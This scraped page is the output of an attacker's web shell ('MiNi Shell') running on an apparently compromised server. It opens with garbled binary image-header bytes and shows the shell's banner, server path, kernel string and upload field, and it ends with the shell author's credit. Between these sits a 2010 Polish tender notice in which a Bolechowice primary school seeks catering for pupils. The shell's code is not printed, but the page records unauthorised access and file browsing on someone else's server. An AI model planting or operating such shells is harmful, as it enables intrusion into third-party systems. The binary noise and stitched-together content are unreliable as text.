JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101130/388666-N-2010.html

<p class="kh_header"><b>Bolechowice: Świadczenie usługi cateringowej w zakresie dożywiania dzieci.</b><br>
<b>Numer ogłoszenia: 388666 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. ks. J. Poniatowskiego w Bolechowicach , ul. Szkolna 7, 32-082 Bolechowice, woj. małopolskie, tel. 012 2851184, faks 012 2851184.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spbolechowice.zabierzow.org.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Publiczna szkoła podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi cateringowej w zakresie dożywiania dzieci..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Świadczenie usługi cateringowej w zakresie dożywiania dzieci uczęszczających do  Szkoły Podstawowej w Bolechowicach i oddziałów przedszkolnych przy szkole prowadzonych przez Gminę Zabierzów na rok 2011 z przerwami przewidzianymi przepisami o organizacji roku szkolnego. Wykonanie i dowóz posiłków dla dzieci w czasie przerwy obiadowej.
Ilość posiłków (jeden posiłek gorący: zupa + II danie + kompot) dla dzieci w wieku 6 lat wykonania dziennie :  10
Wartość kaloryczna posiłków wynosi ok. 1100 kcal.
 Łączna ilość posiłków dla całości zamówienia (czyli w ciągu 10 miesięcy dla oddziałów przedszkolnych dla dzieci 6-cio letnich)   nie przekroczy 1830 sztuk
Ilość posiłków (jeden posiłek gorący: zupa + II danie + kompot) dla uczniów szkoły do wykonania dziennie :  40
Łączna ilość posiłków dla całości zamówienia (czyli w ciągu 10 miesięcy dla uczniów szkół podstawowych nie przekroczy: 7320 sztuk
Wartość kaloryczna posiłków wynosi ok. 1400 kcal..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OPIS SPOSOBU PRZYGOTOWANIA OFERT.

1. Oferta musi być sporządzona na formularzu OFERTY, stanowiącym załącznik nr 1 
 do niniejszej specyfikacji istotnych warunków zamówienia lub w oparciu o wzór 
 formularza. Stanowić on będzie pierwszą stronę oferty.
2. Do oferty muszą być załączone wszystkie dokumenty aktualne, wymagane odpowiednimi 
  postanowieniami ust. III Instrukcji dla Wykonawców.
3. Dokumenty, o których mowa  w pkt. 2 i wymienione w Rozporządzeniu Prezesa Rady  
       Ministrów z dnia  30.12.2009r. w sprawie rodzajów dokumentów, jakich może żądać 
    zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane  ,
    mogą być przedstawione w formie oryginałów  lub kserokopii poświadczonej za zgodność 
    z oryginałem przez wykonawcę  osoby podpisujące ofertę.
4.   Oferta jak i wszystkie załączniki do oferty (w  tym kserokopie dokumentów) muszą być 
podpisane przez osoby upoważnione do reprezentowania wykonawcy, których prawo do 
reprezentacji wynika z wpisu do właściwego rejestru lub ewidencji działalności gospodarczej 
bądź udzielonego pełnomocnictwa. 
5. Jeżeli wykonawcą jest spółka cywilna, dokumenty o których mowa w pkt 1, 2 i 3 muszą podpisać wszyscy wspólnicy, chyba że umowa spółki cywilnej wyraźnie powierza prawo do reprezentacji tylko niektórym z nich, bądź zostało udzielone pełnomocnictwo. W razie wątpliwości przyjmuje się, że uczestnictwo w przetargu i podpisywanie bezwzględnie     wszystkich dokumentów, (w tym za zgodność z oryginałem ) jest czynnością przekraczającą     zakres zwykłych czynności spółki.
6. Wykonawcy przedstawią oferty zgodnie z wymaganiami specyfikacji istotnych warunków 
       zamówienia. 
7. Alternatywy nie będą brane pod uwagę a ich złożenie spowoduje wykluczenie Wykonawców z postępowania.
8. Oferta musi być sporządzona w języku polskim.
9. Oferta musi być napisana na komputerze lub nieścieralnym atramentem oraz musi być podpisana przez upoważnionego przedstawiciela Wykonawcy lub przedstawicieli.
10.  Wykonawca musi zamieścić ofertę w kopercie, która będzie zaadresowana na adres Zamawiającego, podany na wstępie oraz oznaczona napisem:

Przetarg nieograniczony na usługę cateringową w szkołach
oraz posiadać klauzulę: nie otwierać przed  08.12.2010 r   godz. 11

11. Poza oznaczeniami podanymi powyżej, koperta musi posiadać nazwę  i adres wykonawcy, aby  
      można było odesłać ofertę w przypadku stwierdzenia jej opóźnienia.
12. Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę pod warunkiem,  
      że Zamawiający otrzyma pisemne powiadomienie o wprowadzeniu zmian lub wycofaniu 
      przed terminem składania ofert określonym w specyfikacji.
13. Powiadomienie o wprowadzeniu zmian lub wycofaniu zostanie przygotowane
     i oznaczone jak w punkcie 10  i 11  a  koperta będzie dodatkowo oznaczona 
     określeniami Zmiana lub Wycofanie.
14. Wykonawca nie może wycofać oferty i wprowadzić zmian w ofercie po upływie terminu 
     składania ofert.



Ust.II. OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBÓW DOKONYWANIA OCENY SPEŁNIENIA WARUNKÓW WYMAGANYCH OD WYKONAWCÓW.

	Do przetargu zostaną zakwalifikowani wykonawcy, którzy:

1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
    nakładają obowiązek posiadania takich uprawnień;

2 posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny i  dysponują 
    osobami zdolnymi do wykonania zamówienia;

3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4 nie podlegający wykluczeniu z postępowania,
5. decyzję Sanepidu zezwalającej na prowadzenie działalności gastronomicznej
6. decyzję Sanepidu o dopuszczeniu samochodu do przewozu żywności



W celu potwierdzenia spełnienia opisanych wyżej warunków, Wykonawca musi załączyć do oferty oświadczenia lub dokumenty wymagane w ust. III. Ocena spełnienia ww warunków dokonana zostanie z formułą,  spełnia  - nie spełnia, w oparciu o oświadczenia lub dokumenty załączone do oferty. Z treści przedstawionych dokumentów musi wynikać jednoznacznie, iż ww warunki wykonawca spełnia. Niespełnienie chociażby jednego z warunków udziału w przetargu skutkować będzie wykluczeniem Wykonawcy z postępowania i odrzuceniem oferty. 

Zamawiający wykluczy z postępowania wykonawcę jeżeli stwierdzi, że dostarczone przez niego
    informacje istotne dla prowadzonego postępowania są nieprawdziwe.

 O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy złożą ofertę nie 
    podlegającą odrzuceniu.

 Zamawiający dokona wyboru Wykonawcy spośród ofert ważnych i nie odrzuconych, wyłącznie na podstawie kryteriów oceny ofert, określonych w niniejszej specyfikacji .
 Zamawiający odrzuci ofertę w przypadku zaistnienia okoliczności, o których mowa
    w art. 89 Ustawy Prawo zamówień publicznych.
    Ważna oferta musi spełniać warunki:
    a) zachowanie prawidłowej pisemnej formy oferty;
    b) nie może być dotknięta  wadą oświadczeń woli;
    c) treść oferty nie może być sprzeczna z treścią zamówienia.
 Oferta musi być sporządzona na piśmie w języku polskim.
Oferta musi być złożona w terminie wyznaczonym przez Zamawiającego jako
       termin składania ofert.

6. Oferta musi zawierać wszystkie dokumenty wymagane w ust. III.




Ust. III OFERTA MUSI ZAWIERAĆ NASTĘPUJĄCE DOKUMENTY lub
		ZAŁĄCZNIKI dot. Wykonawcy:

1. Opis przedmiotu zamówienia lub oświadczenie złożone na druku OFERTA zał .nr  1
o zgodności przedmiotu oferty z przedmiotem zamówienia. 

2. Pełnomocnictwo - w przypadku podpisywania oferty i pozostałych dokumentów przez 
    pełnomocnika. Właściwie sporządzone i podpisane pełnomocnictwo należy dołączyć 
    do oferty.  (załączyć jeżeli dotyczy).

3. Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji 
    działalności gospodarczej, jeżeli odrębne przepisy wymagają  wpisu do rejestru
     lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej
     niż 6 miesięcy przed upływem terminu składania ofert określający pełną nazwę firmy, 
     stan prawny, miejsce rejestracji, dokładny adres firmy składającej ofertę, jednocześnie
     potwierdzający, że profil działania oferenta odpowiada profilowi robót objętych 
     przetargiem)
4. decyzję Sanepidu zezwalającej na prowadzenie działalności gastronomicznej
5. decyzję Sanepidu o dopuszczeniu samochodu do przewozu żywności

5.  Polisa  lub inny dokument ubezpieczenia potwierdzający, że  
     Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
         prowadzonej działalności gospodarczej.

6. Umowę regulującą współpracę podmiotów występujących wspólnie,
      np. umowa spółki cywilnej lub inne. ( załączyć jeżeli dotyczy).

7. Oświadczenie Wykonawcy w trybie art.22 ust. Ustawy prawo zamówień publicznych 
   oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ww ustawy
    na formularzu stanowiącym  załącznik nr 2.

8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
       Polskiej składa odpowiedni dokument lub dokumenty zgodnie z Rozporządzeniem Prezesa 
       Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać 
       zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane 
       (załączyć jeżeli dotyczy).

9.  W załączniku nr 3 zatytułowanym Podwykonawcy żądamy wskazania, jaką cześć 
      zamówienia wykonawca zamierza powierzyć podwykonawcy.    
    W przypadku, gdy Wykonawca będzie korzystał z usług Podwykonawców, musi dołączyć do 
    oferty podpisane przez Podwykonawcę Oświadczenie o gotowości do współpracy z Wykonawcą 
    w zakresie realizacji powierzonej części przedmiotu zamówienia. 
   Jeżeli Wykonawca nie zamierza powierzyć części zamówienia podwykonawcom, załącza 
   Załącznik nr 3 do oferty z adnotacją (nie dotyczy).

10.  Podpisany lub zaparafowany projekt umowy .


W przypadku podmiotów występujących wspólnie  warunki i odpowiadające im dokumenty wymienione w pkt 3, 4, 6, 7  musi spełniać każdy wykonawca.
Natomiast warunki i dokumenty pozostałe wykonawcy ci mogą spełniać i składać łącznie.

Brak któregokolwiek dokumentu wymienionego powyżej lub złożenie dokumentu o  niewłaściwej 
treści lub w niewłaściwej  formie spowoduje odrzucenie oferty wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do przetargu zostaną zakwalifikowani wykonawcy, którzy:

1posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
    nakładają obowiązek posiadania takich uprawnień;

2 posiadają niezbędną wiedzę i doświadczenie w zakresie prowadzenia działalności gastronomicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do przetargu zostaną zakwalifikowani wykonawcy, którzy:

1.Posiadają    potencjał techniczny i  dysponują 
    osobami zdolnymi do wykonania zamówienia;

2 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

3 nie podlegający wykluczeniu z postępowania,
4 decyzję Sanepidu zezwalającej na prowadzenie działalności gastronomicznej
5. decyzję Sanepidu o dopuszczeniu samochodu do przewozu żywności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Opis przedmiotu zamówienia lub oświadczenie złożone na druku OFERTA zał .nr  1
o zgodności przedmiotu oferty z przedmiotem zamówienia. 

2. Pełnomocnictwo - w przypadku podpisywania oferty i pozostałych dokumentów przez 
    pełnomocnika. Właściwie sporządzone i podpisane pełnomocnictwo należy dołączyć 
    do oferty. załączyć jeżeli dotyczy.

3. Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji 
    działalności gospodarczej, jeżeli odrębne przepisy wymagają  wpisu do rejestru
     lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej
     niż 6 miesięcy przed upływem terminu składania ofert (określający pełną nazwę firmy, 
     stan prawny, miejsce rejestracji, dokładny adres firmy składającej ofertę, jednocześnie
     potwierdzający, że profil działania oferenta odpowiada profilowi robót objętych 
     przetargiem)
4. decyzję Sanepidu zezwalającej na prowadzenie działalności gastronomicznej
5. decyzję Sanepidu o dopuszczeniu samochodu do przewozu żywności

5..  Polisa  lub inny dokument ubezpieczenia potwierdzający, że  
         Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
         prowadzonej działalności gospodarczej.

6. Umowę regulującą współpracę podmiotów występujących wspólnie,
      np. umowa spółki cywilnej lub inne.  załączyć jeżeli dotyczy.

7. Oświadczenie Wykonawcy w trybie art.22 ust. Ustawy prawo zamówień publicznych 
   oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ww ustawy
    na formularzu stanowiącym  załącznik nr 2.

8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
       Polskiej składa odpowiedni dokument lub dokumenty zgodnie z Rozporządzeniem Prezesa 
       Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać 
       zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane 
       załączyć jeżeli dotyczy.

9.  W załączniku nr 3 zatytułowanym Podwykonawcy żądamy wskazania, jaką cześć 
      zamówienia wykonawca zamierza powierzyć podwykonawcy.    
    W przypadku, gdy Wykonawca będzie korzystał z usług Podwykonawców, musi dołączyć do 
    oferty podpisane przez Podwykonawcę Oświadczenie o gotowości do współpracy z Wykonawcą 
    w zakresie realizacji powierzonej części przedmiotu zamówienia. 
   Jeżeli Wykonawca nie zamierza powierzyć części zamówienia podwykonawcom, załącza 
   Załącznik nr 3 do oferty z adnotacją nie dotyczy.

10.  Podpisany lub zaparafowany projekt umowy .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła  Podstawowa im.ks.Józefa Poniatowskiego w Bolechowicach ul.Szkolna 7,32-082 Bolechowice -sekretariat szkoły..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2010 godzina 11:00, miejsce: Szkoła  Podstawowa im.ks.Józefa Poniatowskiego w Bolechowicach ul.Szkolna 7,32-082 Bolechowice -sekretariat szkoły..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com